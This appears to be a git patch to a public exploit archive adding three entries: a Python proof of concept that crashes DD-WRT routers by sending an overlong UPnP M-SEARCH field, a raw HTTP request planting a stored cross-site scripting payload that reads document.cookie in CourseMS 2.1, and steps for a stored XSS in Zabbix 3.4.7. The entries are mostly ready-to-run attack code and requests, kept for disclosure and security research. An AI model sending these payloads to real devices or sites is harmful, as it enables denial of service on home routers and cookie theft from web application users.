From 3145bbcf804e57abc54f4658c54321f8c98c9caf Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 1 Apr 2021 05:02:01 +0000 Subject: [PATCH] DB: 2021-04-01 3 changes to exploits/shellcodes DD-WRT 45723 - UPNP Buffer Overflow (PoC) Zabbix 3.4.7 - Stored XSS CourseMS 2.1 - 'name' Stored XSS --- exploits/hardware/dos/49730.py | 28 ++++++++++++++++++++++++++++ exploits/multiple/webapps/49731.txt | 26 ++++++++++++++++++++++++++ exploits/php/webapps/49729.txt | 16 ++++++++++++++++ files_exploits.csv | 3 +++ 4 files changed, 73 insertions(+) create mode 100755 exploits/hardware/dos/49730.py create mode 100644 exploits/multiple/webapps/49731.txt create mode 100644 exploits/php/webapps/49729.txt diff --git a/exploits/hardware/dos/49730.py b/exploits/hardware/dos/49730.py new file mode 100755 index 000000000..384edb62f --- /dev/null +++ b/exploits/hardware/dos/49730.py @@ -0,0 +1,28 @@ +# Exploit Title: DD-WRT 45723 - UPNP Buffer Overflow (PoC) +# Date: 24.03.2021 +# Exploit Author: Selim Enes 'Enesdex' Karaduman +# Vendor Homepage: https://dd-wrt.com/ +# Software Link: https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/2021/ +# Version: 45723 or prior +# Tested on: TP-Link Archer C7 + +# https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/ + +import socket + +target_ip = "192.168.2.1" # IP Address of Target +off = "D"*164 +ret_addr = "AAAA" + +payload = off + ret_addr + +packet = \ + 'M-SEARCH * HTTP/1.1\r\n' \ + 'HOST:239.255.255.250:1900\r\n' \ + 'ST:uuid:'+payload+'\r\n' \ + 'MX:2\r\n' \ + 'MAN:"ssdp:discover"\r\n' \ + '\r\n' + +s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) +s.sendto(packet, (target_ip, 1900) ) \ No newline at end of file diff --git a/exploits/multiple/webapps/49731.txt b/exploits/multiple/webapps/49731.txt new file mode 100644 index 000000000..1605f01f0 --- /dev/null +++ b/exploits/multiple/webapps/49731.txt @@ -0,0 +1,26 @@ +# Exploit Title: CourseMS 2.1 - 'name' Stored XSS +# Date: 03/30/2021 +# Exploit Author: cptsticky +# Vendor Homepage: http://sourceforge.net/projects/coursems +# Software Link: https://sourceforge.net/projects/coursems/files/latest/download +# Version: 2.1 +# Tested on: Ubuntu 20.04 + +POST /coursems/admin/add_jobs.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 91 +Origin: http://localhost +Connection: close +Referer: http://localhost/coursems/admin/add_jobs.php +Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) +Upgrade-Insecure-Requests: 1 + +name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title + + +Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS \ No newline at end of file diff --git a/exploits/php/webapps/49729.txt b/exploits/php/webapps/49729.txt new file mode 100644 index 000000000..ddfd73c08 --- /dev/null +++ b/exploits/php/webapps/49729.txt @@ -0,0 +1,16 @@ +# Exploit Title: Zabbix 3.4.7 - Stored XSS +# Date: 30-03-2021 +# Exploit Author: Radmil Gazizov +# Vendor Homepage: https://www.zabbix.com/ +# Software Link: https://www.zabbix.com/rn/rn3.4.7 +# Version: 3.4.7 +# Tested on: Linux + +# Reference - +https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt + +1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382) +2- Create new dashboard +3- Add a new widget => Type: Map nabigation tree +4- Past into parameter "Name": +5- Click to "Add" button \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 628864ab3..f08d7771f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6776,6 +6776,7 @@ id,file,description,date,author,type,platform,port 49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows, 49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware, 49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",2021-03-22,xynmaps,dos,multiple, +49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -43907,3 +43908,5 @@ id,file,description,date,author,type,platform,port 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java, 49725,exploits/windows/webapps/49725.py,"SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow",2021-03-29,"Filipe Oliveira",webapps,windows, 49727,exploits/multiple/webapps/49727.txt,"Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting",2021-03-30,cmOs,webapps,multiple, +49729,exploits/php/webapps/49729.txt,"Zabbix 3.4.7 - Stored XSS",2021-03-31,"Radmil Gazizov",webapps,php, +49731,exploits/multiple/webapps/49731.txt,"CourseMS 2.1 - 'name' Stored XSS",2021-03-31,cptsticky,webapps,multiple,